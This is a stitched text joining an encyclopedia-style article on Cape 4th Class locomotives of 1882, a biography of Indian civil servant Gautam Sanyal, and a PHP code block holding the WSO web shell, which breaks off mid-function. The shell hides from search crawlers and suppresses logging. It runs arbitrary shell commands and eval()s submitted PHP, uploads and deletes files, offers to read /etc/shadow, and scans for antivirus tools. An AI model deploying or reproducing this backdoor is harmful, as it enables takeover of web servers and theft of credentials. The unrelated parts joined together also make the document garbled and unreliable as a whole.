Thirty-three were built by Stephenson's, with Stephenson valve gear. Of these, nine locomotives went to the Western System, operating out of Cape Town, and were numbered in the range from W47 to W55. Twenty went to the Midland System, operating out of Port Elizabeth, and were numbered in the range from M58 to M75, M84 and M85. Four went to the Eastern System, operating out of East London, and were numbered in the range from E35 to E38.
Characteristics
All these locomotives had diameter coupled wheels, unlike the six 4th Class locomotives which had been delivered to the Eastern System in 1880 and 1881, which had smaller diameter coupled wheels. These 33 locomotives were delivered with Stephenson valve gear, like their predecessors of 1880 and 1881.
Since these locomotives were delivered with permanently coupled tenders, their cabs did not need side entrances with double handrails, like their predecessors of 1880 and 1881 did with their optional tenders. Access was by pairs of steps, mounted on the engine as well as on the tender, with one handrail attached to the engine and the other to the tender.
Modifications
On the Eastern System, problems were experienced with the low-grade local coal from the Cyphergat and Molteno collieries in the Stormberg. It had a high content of non-combustible material which often caused delays, since it required frequent stops to allow the stoker to clear the grate of clinker and ash, a tedious task which required the locomotive to be stationary.
John D. Tilney, the Eastern System Locomotive Superintendent, carried out many experiments in an attempt to overcome the coal problem. Some of these involved modifying some of the 4th Class locomotives in order to install oscillating firebars and larger fireboxes.
Another modification by Tilney was an extended smokebox, to make room for a very efficient spark arrester which was constructed of wire mesh. Several locomotives were altered to incorporate these spark arresters, as shown in the photograph alongside of a locomotive with an extended smokebox.
Tilney's initiatives did not pass unnoticed. In 1881, the General Manager appointed Hawthorne R. Thornton as Chief Locomotive Superintendent for the whole of the Cape of Good Hope, in response to the "growing tendency on the part of the several Locomotive Superintendents to bring in modifications of designs in essential parts of the engines and rolling stock".
After Michael Stephens retired and H.M. Beatty took over as Chief Locomotive Superintendent of the CGR in 1896, two of the locomotives were converted to regular tender engines by removing their side-tanks.
Service
Cape Government Railways
At the time these 4th Class locomotives entered service, the two Eastern System mainlines were open to King William's Town and approaching Sterkstroom respectively. Those of the Midland System were completed to Graaff Reinet and approaching Cradock respectively, while the Western System mainline was open to Beaufort West.
All these locomotives were renumbered more than once during their service lives on the CGR. By 1886, the system prefixes had been done away with and the Midland System's locomotives had all been renumbered by replacing the letter prefix "M" with the numeral "1". The Western System locomotives were allocated new numbers in the 100 range. By 1888, the Eastern System locomotives had been renumbered into the 600 number range. The Midland System locomotives were renumbered twice more, into the 200 number range by 1890 and into the 400 number range by 1899. All these renumberings are listed in the table below.
Kowie Railway
At some stage after 1904, three of these locomotives, numbers 470, 471 and 477, were sold to the Kowie Railway Company, which operated a line between Port Alfred and Grahamstown. They were renumbered 1, 3 and 2 respectively.
South African Railways
When the Union of South Africa was established on 31 May 1910, the three Colonial government railways (CGR, Natal Government Railways and Central South African Railways) were united under a single administration to control and administer the railways, ports and harbours of the Union. Although the South African Railways and Harbours came into existence in 1910, the actual classification and renumbering of all the rolling stock of the three constituent railways was only implemented with effect from 1 January 1912.
By 1912, nine locomotives survived. They were considered obsolete by the South African Railways, designated Class 04 and renumbered by having the numeral "0" prefixed to their existing numbers. Despite being considered obsolete, some of them were still being employed as shunting locomotives in Port Elizabeth in 1932. The rest had been scrapped by 1918.
Works numbers
The works numbers, years built, original numbers, renumbering and disposal of the Cape 4th Class of 1882 are listed in the table.
References
0340
0340
4-6-0 locomotives
2′C n2t locomotives
Robert Stephenson and Company locomotives
Cape gauge railway locomotives
Railway locomotives introduced in 1882
1882 in South Africa
Scrapped locomotives
|
Gautam Sanyal is an Indian career civil servant who currently serves as Principal Secretary to Government of West Bengal, since June 2015. In June 2016, he was re-appointed as Principal Secretary and his tenure co-terminus with that of Chief Minister of West Bengal.
He previously served as Secretary to Chief Minister of West Bengal from 2011 to 2015. He also previously served as Joint Secretary to Government of India. He is a 1978 batch Central Secretariat Service officer.
Early life and education
Sanyal has a Bachelor of Arts in political science, a Masters in Sociology and the later earned a Master of Business Administration from United Kingdom.
Career
Sanyal joined the Central Secretariat Service in 1976 after qualifying through the Civil Services Examination. He rose through ranks and was later empanelled as Joint Secretary to Government of India in Ministry of Food Processing Industries in June 2009 by the Appointments Committee of the Cabinet. He was also the board member of the Food Safety and Standards Authority of India.
He later served as Officer on Special Duty to Union Cabinet Minister of Railways from 2009 to 2011. He retired in 2011.
After retirement from the Central Government, he was appointed as Secretary to the Chief Minister of West Bengal. His appointment and tenure to the post was made co-terminous with that of the Chief Minister.
Recognition
He is the first non Indian Administrative Service officer in West Bengal and the first retired civil servant to hold the position of Secretary in the Chief Ministers Office. He also became the first non IAS officer in history to hold the position of Principal Secretary in State governments of India.
In 2011, a news blog declared him as the new poster boy of India's civil services. The Indian Express and The Financial Express rate him as top state bureaucrat in India in the article most powerful Indians for the year 2013. Many media articles consider him to the most powerful civil servant in the state in India and the "most important officer" in the Government of West Bengal.
In 2015, Ministry of Personnel, Public Grievances and Pensions (DOPT) of Government of India rejected petition filed by the IAS association against the appointment of Gautam Sanyal as the Principal Secretary. In 2018, India Today listed Sanyal in top 10 hidden corridor power in India.
Issues
In 2013, media articles reported that CBI director Ranjit Sinha had placed Sanyal on his hit-list. In 2019, media reported that Sanyal is in the process of investigation by Enforcement Directorate in connection with the disinvestment of a state government company in West Bengal.
References
External links
Departmental Secretaries (Archived) Official Government of West Bengal (2018)
Appointment to Government (Archived) Official Government of West Bengal, Personnel and Administrative Reforms (2015)
IAS Lobby Frets Over Eroding Monopoly The New Indian Express (2015)
Mamata ropes in officials from Railway Ministry
Civil Servants scramble to keep up with workaholic Chief Minister
The list of Presentations of the Proceedings of Food Safety And Quality Year 2008–09
1951 births
Living people
Bengali people
People from West Bengal
Indian civil servants
Indian government officials
Central Secretariat Service officers
|
```php
<?php $auth_pass = "866fd58d77526c1bda8771b5b21d5b11"; $color = "#df5"; $default_action = 'FilesMan'; $default_use_ajax = true; $default_charset = 'Windows-1251'; if(!empty($_SERVER['HTTP_USER_AGENT'])) { $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "Bing"); if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) { header('HTTP/1.0 404 Not Found'); exit; } } @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @set_time_limit(0); @set_magic_quotes_runtime(0); @define('WS_VER', '2'); if(get_magic_quotes_gpc()) { function WSOstripslashes($array) { return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array); } $_POST = WSOstripslashes($_POST); $_COOKIE = WSOstripslashes($_COOKIE); } function wsoLogin() { die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>"); } function WSOsetcookie($k, $v) { $_COOKIE[$k] = $v; setcookie($k, $v); } if(!empty($auth_pass)) { if(isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass)) WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass); if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass)) wsoLogin(); } if(strtolower(substr(PHP_OS,0,3)) == "win") $os = 'win'; else $os = 'nix'; $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) error_reporting(0); $disable_functions = @ini_get('disable_functions'); $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("\\", "/", $home_cwd); $cwd = str_replace("\\", "/", $cwd); } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'])) $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$default_use_ajax; if($os == 'win') $aliases = array( "List Directory" => "dir", "IP Configuration" => "ipconfig /all" ); else $aliases = array( "List dir" => "ls -lha", "locate priv files" => "locate priv" ); function wsoHeader() { if(empty($_POST['charset'])) $_POST['charset'] = $GLOBALS['default_charset']; global $color; echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WS_VER ."</title>
<style>
body{background-color:#444;color:#e1e1e1;}
body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
table.info{ color:#fff;background-color:#222; }
span,h1,a{ color: $color !important; }
span{ font-weight: bolder; }
h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
div.content{ padding: 5px;margin-left:5px;background-color:#333; }
a{ text-decoration:none; }
a:hover{ text-decoration:underline; }
.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
.bigarea{ width:100%;height:300px; }
input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
form{ margin:0px; }
#toolsTbl{ text-align:center; }
.toolsInp{ width: 300px }
.main th{text-align:left;background-color:#5e5e5e;}
.main tr:hover{background-color:#5e5e5e}
.l1{background-color:#444}
.l2{background-color:#333}
pre{font-family:Courier,Monospace;}
</style>
<script>
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
var d = document;
function set(a,c,p1,p2,p3,charset) {
if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
}
function g(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
d.mf.submit();
}
function a(a,c,p1,p2,p3,charset) {
set(a,c,p1,p2,p3,charset);
var params = 'ajax=true';
for(i=0;i<d.mf.elements.length;i++)
params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
}
function sr(url, params) {
if (window.XMLHttpRequest)
req = new XMLHttpRequest();
else if (window.ActiveXObject)
req = new ActiveXObject('Microsoft.XMLHTTP');
if (req) {
req.onreadystatechange = processReqChange;
req.open('POST', url, true);
req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
req.send(params);
}
}
function processReqChange() {
if( (req.readyState == 4) )
if(req.status == 200) {
var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
var arr=reg.exec(req.responseText);
eval(arr[2].substr(0, arr[1]));
} else alert('Request error!');
}
</script>
<head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
<form method=post name=mf style='display:none;'>
<input type=hidden name=a>
<input type=hidden name=c>
<input type=hidden name=p1>
<input type=hidden name=p2>
<input type=hidden name=p3>
<input type=hidden name=charset>
</form>"; $freeSpace = @diskfreespace($GLOBALS['cwd']); $totalSpace = @disk_total_space($GLOBALS['cwd']); $totalSpace = $totalSpace?$totalSpace:1; $release = @php_uname('r'); $kernel = @php_uname('s'); $explink = ''; if(strpos('Linux', $kernel) !== false) $explink .= urlencode('Linux Kernel ' . substr($release,0,6)); else $explink .= urlencode($kernel . ' ' . substr($release,0,3)); if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid['name']; $uid = $uid['uid']; $group = $gid['name']; $gid = $gid['gid']; } $cwd_links = ''; $path = explode("/", $GLOBALS['cwd']); $n=count($path); for($i=0; $i<$n-1; $i++) { $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; for($j=0; $j<=$i; $j++) $cwd_links .= $path[$j].'/'; $cwd_links .= "\")'>".$path[$i]."/</a>"; } $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); $opt_charsets = ''; foreach($charsets as $item) $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Network'=>'Network'); if(!empty($GLOBALS['auth_pass'])) $menu = ''; foreach($m as $k => $v) $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; $drives = ""; if($GLOBALS['os'] == 'win') { foreach(range('c','z') as $drive) if(is_dir($drive.':\\')) $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; } echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>' . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="' . $explink . '" target=_blank>[exploit-db.com]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=green><b>OFF</b></font>') . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>' . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>' . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">'; } function wsoFooter() { $is_writable = is_writable($GLOBALS['cwd'])?" <font color='green'>(Writeable)</font>":" <font color=red>(Not writable)</font>"; echo "
</div>
<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'>
<tr>
<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
</tr><tr>
<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
<td><form method='post' ENCTYPE='multipart/form-data'>
<input type=hidden name=a value='FilesMAn'>
<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
<input type=hidden name=p1 value='uploadFile'>
<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td>
</tr></table></div></body></html>"; } if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} } if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} } function wsoEx($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function wsoViewSize($s) { if (is_int($s)) $s = sprintf("%u", $s); if($s >= 1073741824) return sprintf('%1.2f', $s / 1073741824 ). ' GB'; elseif($s >= 1048576) return sprintf('%1.2f', $s / 1048576 ) . ' MB'; elseif($s >= 1024) return sprintf('%1.2f', $s / 1024 ) . ' KB'; else return $s . ' B'; } function wsoPerms($p) { if (($p & 0xC000) == 0xC000)$i = 's'; elseif (($p & 0xA000) == 0xA000)$i = 'l'; elseif (($p & 0x8000) == 0x8000)$i = '-'; elseif (($p & 0x6000) == 0x6000)$i = 'b'; elseif (($p & 0x4000) == 0x4000)$i = 'd'; elseif (($p & 0x2000) == 0x2000)$i = 'c'; elseif (($p & 0x1000) == 0x1000)$i = 'p'; else $i = 'u'; $i .= (($p & 0x0100) ? 'r' : '-'); $i .= (($p & 0x0080) ? 'w' : '-'); $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); $i .= (($p & 0x0020) ? 'r' : '-'); $i .= (($p & 0x0010) ? 'w' : '-'); $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); $i .= (($p & 0x0004) ? 'r' : '-'); $i .= (($p & 0x0002) ? 'w' : '-'); $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); return $i; } function wsoPermsColor($f) { if (!@is_readable($f)) return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>'; elseif (!@is_writable($f)) return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>'; else return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>'; } function wsoScandir($dir) { if(function_exists("scandir")) { return scandir($dir); } else { $dh = opendir($dir); while (false !== ($filename = readdir($dh))) $files[] = $filename; return $files; } } function wsoWhich($p) { $path = wsoEx('which ' . $p); if(!empty($path)) return $path; return false; } function actionSecInfo() { wsoHeader(); echo '<h1>Server security information</h1><div class=content>'; function wsoSecParam($n, $v) { $v = trim($v); if($v) { echo '<span>' . $n . ': </span>'; if(strpos($v, "\n") === false) echo $v . '<br>'; else echo '<pre class=ml1>' . $v . '</pre>'; } } wsoSecParam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules())); wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none'); wsoSecParam('Open base dir', @ini_get('open_basedir')); wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; wsoSecParam('Supported databases', implode(', ', $temp)); echo '<br>'; if($GLOBALS['os'] == 'nix') { wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no'); wsoSecParam('OS version', @file_get_contents('/proc/version')); wsoSecParam('Distr name', @file_get_contents('/etc/issue.net')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '<br>'; $temp=array(); foreach ($userful as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(wsoWhich($item)) $temp[] = $item; wsoSecParam('Downloaders', implode(', ',$temp)); echo '<br/>'; wsoSecParam('HDD space', wsoEx('df -h')); wsoSecParam('Hosts', @file_get_contents('/etc/hosts')); echo '<br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>'; if (isset ($_POST['p2'], $_POST['p3']) && is_numeric($_POST['p2']) && is_numeric($_POST['p3'])) { $temp = ""; for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) { $uid = @posix_getpwuid($_POST['p2']); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; wsoSecParam('Users', $temp); } } } else { wsoSecParam('OS Version',wsoEx('ver')); wsoSecParam('Account Settings',wsoEx('net accounts')); wsoSecParam('User Accounts',wsoEx('net user')); } echo '</div>'; wsoFooter(); } function actionPhp() { if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); ob_start(); eval($_POST['p1']); $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax']) && !empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); wsoHeader(); if(isset($_POST['p2']) && ($_POST['p2'] == 'info')) { echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; ob_start(); phpinfo(); $tmp = ob_get_clean(); $tmp = preg_replace(array ( '!(body|a:\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU', ), array ( '', '.e, .v, .h, .h th {$1}', '' ), $tmp); echo str_replace('<h1','<h2', $tmp) .'</div><br>'; } echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; if(!empty($_POST['p1'])) { ob_start(); eval($_POST['p1']); echo htmlspecialchars(ob_get_clean()); } echo '</pre></div>'; wsoFooter(); } function actionFilesMan() { if (!empty ($_COOKIE['f'])) $_COOKIE['f'] = @unserialize($_COOKIE['f']); if(!empty($_POST['p1'])) { switch($_POST['p1']) { case 'uploadFile': if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) echo "Can't upload file!"; break; case 'mkdir': if(!@mkdir($_POST['p2'])) echo "Can't create new dir"; break; case 'delete': function deleteDir($path) { $path = (substr($path,-1)=='/') ? $path:$path.'/'; $dh = opendir($path); while ( ($item = readdir($dh) ) !== false) { $item = $path.$item; if ( (basename($item) == "..") || (basename($item) == ".") ) continue; $type = filetype($item); if ($type == "dir") deleteDir($item); else @unlink($item); } closedir($dh); @rmdir($path); } if(is_array(@$_POST['f'])) foreach($_POST['f'] as $f) { if($f == '..') continue; $f = urldecode($f); if(is_dir($f)) deleteDir($f); else @unlink($f); } break; case 'paste': if($_COOKIE['act'] == 'copy') { function copy_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']); } elseif($_COOKIE['act'] == 'move') { function move_paste($c,$s,$d){ if(is_dir($c.$s)){ mkdir($d.$s); $h = @opendir($c.$s); while (($f = @readdir($h)) !== false) if (($f != ".") and ($f != "..")) copy_paste($c.$s.'/',$f, $d.$s.'/'); } elseif(@is_file($c.$s)) @copy($c.$s, $d.$s); } foreach($_COOKIE['f'] as $f) @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f); } elseif($_COOKIE['act'] == 'zip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); if ($zip->open($_POST['p2'], 1)) { chdir($_COOKIE['c']); foreach($_COOKIE['f'] as $f) { if($f == '..') continue; if(@is_file($_COOKIE['c'].$f)) $zip->addFile($_COOKIE['c'].$f, $f); elseif(@is_dir($_COOKIE['c'].$f)) { $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS)); foreach ($iterator as $key=>$value) { $zip->addFile(realpath($key), $key); } } } chdir($GLOBALS['cwd']); $zip->close(); } } } elseif($_COOKIE['act'] == 'unzip') { if(class_exists('ZipArchive')) { $zip = new ZipArchive(); foreach($_COOKIE['f'] as $f) { if($zip->open($_COOKIE['c'].$f)) { $zip->extractTo($GLOBALS['cwd']); $zip->close(); } } } } elseif($_COOKIE['act'] == 'tar') { chdir($_COOKIE['c']); $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']); wsoEx('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f'])); chdir($GLOBALS['cwd']); } unset($_COOKIE['f']); setcookie('f', '', time() - 3600); break; default: if(!empty($_POST['p1'])) { WSOsetcookie('act', $_POST['p1']); WSOsetcookie('f', serialize(@$_POST['f'])); WSOsetcookie('c', @$_POST['c']); } break; } } wsoHeader(); echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>'; $dirContent = wsoScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); if($dirContent === false) { echo 'Can\'t open this folder!';wsoFooter(); return; } global $sort; $sort = array('name', 1); if(!empty($_POST['p1'])) { if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) $sort = array($match[1], (int)$match[2]); } echo "<script>
function sa() {
for(i=0;i<d.files.elements.length;i++)
if(d.files.elements[i].type == 'checkbox')
d.files.elements[i].checked = d.files.elements[0].checked;
}
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; $dirs = $files = array(); $n = count($dirContent); for($i=0;$i<$n;$i++) { $ow = @posix_getpwuid(@fileowner($dirContent[$i])); $gr = @posix_getgrgid(@filegroup($dirContent[$i])); $tmp = array('name' => $dirContent[$i], 'path' => $GLOBALS['cwd'].$dirContent[$i], 'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])), 'perms' => wsoPermsColor($GLOBALS['cwd'] . $dirContent[$i]), 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) ); if(@is_file($GLOBALS['cwd'] . $dirContent[$i])) $files[] = array_merge($tmp, array('type' => 'file')); elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path']))); elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i])) $dirs[] = array_merge($tmp, array('type' => 'dir')); } $GLOBALS['sort'] = $sort; function wsoCmp($a, $b) { if($GLOBALS['sort'][0] != 'size') return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1); else return (($a['size'] < $b['size']) ? -1 : 